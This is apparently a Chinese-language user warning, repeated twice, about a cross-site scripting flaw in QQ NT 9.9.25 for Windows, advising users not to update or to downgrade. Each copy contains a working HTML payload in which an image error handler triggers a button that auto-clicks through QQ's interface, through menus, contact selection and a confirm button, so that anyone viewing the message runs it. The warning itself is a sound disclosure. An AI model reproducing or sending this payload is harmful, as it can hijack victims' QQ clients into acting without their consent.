警告!
QQ NT 9.9.25 Windows 存在跨站脚本攻击漏洞(XSS)
例如
<div>
<button id="test" onclick="var list = document.documentElement.getElementsByClassName('panel-header__action')[0].children[0];list.children[list.childNodes.length - 1].children[0].click();setTimeout(() => {var an = document.documentElement.getElementsByClassName('group-user--btn')[1];an.children[0].children[0].click();setTimeout(() => {var input = document.getElementsByClassName('relation-tree')[0].getElementsByClassName('viewport-list__inner')[0].children[0].children[0].children[0];input.click();setTimeout(() => document.getElementsByClassName('selector-layout__right-area')[0].getElementsByClassName('q-button--primary')[0].click(), 0)}, 0)}, 1);"></button>
<img src="x" onerror="document.getElementById('test').click()">
</div>
所有在此版本的用户看到特定代码会自动在本机执行
理论上可执行任意点击脚本,具有极高风险
请勿更新到本版本。已在此版本的用户请降级
更新:腾讯内部已知
QQ NT 9.9.25 Windows 存在跨站脚本攻击漏洞(XSS)
例如
<div>
<button id="test" onclick="var list = document.documentElement.getElementsByClassName('panel-header__action')[0].children[0];list.children[list.childNodes.length - 1].children[0].click();setTimeout(() => {var an = document.documentElement.getElementsByClassName('group-user--btn')[1];an.children[0].children[0].click();setTimeout(() => {var input = document.getElementsByClassName('relation-tree')[0].getElementsByClassName('viewport-list__inner')[0].children[0].children[0].children[0];input.click();setTimeout(() => document.getElementsByClassName('selector-layout__right-area')[0].getElementsByClassName('q-button--primary')[0].click(), 0)}, 0)}, 1);"></button>
<img src="x" onerror="document.getElementById('test').click()">
</div>
所有在此版本的用户看到特定代码会自动在本机执行
理论上可执行任意点击脚本,具有极高风险
请勿更新到本版本。已在此版本的用户请降级
更新:腾讯内部已知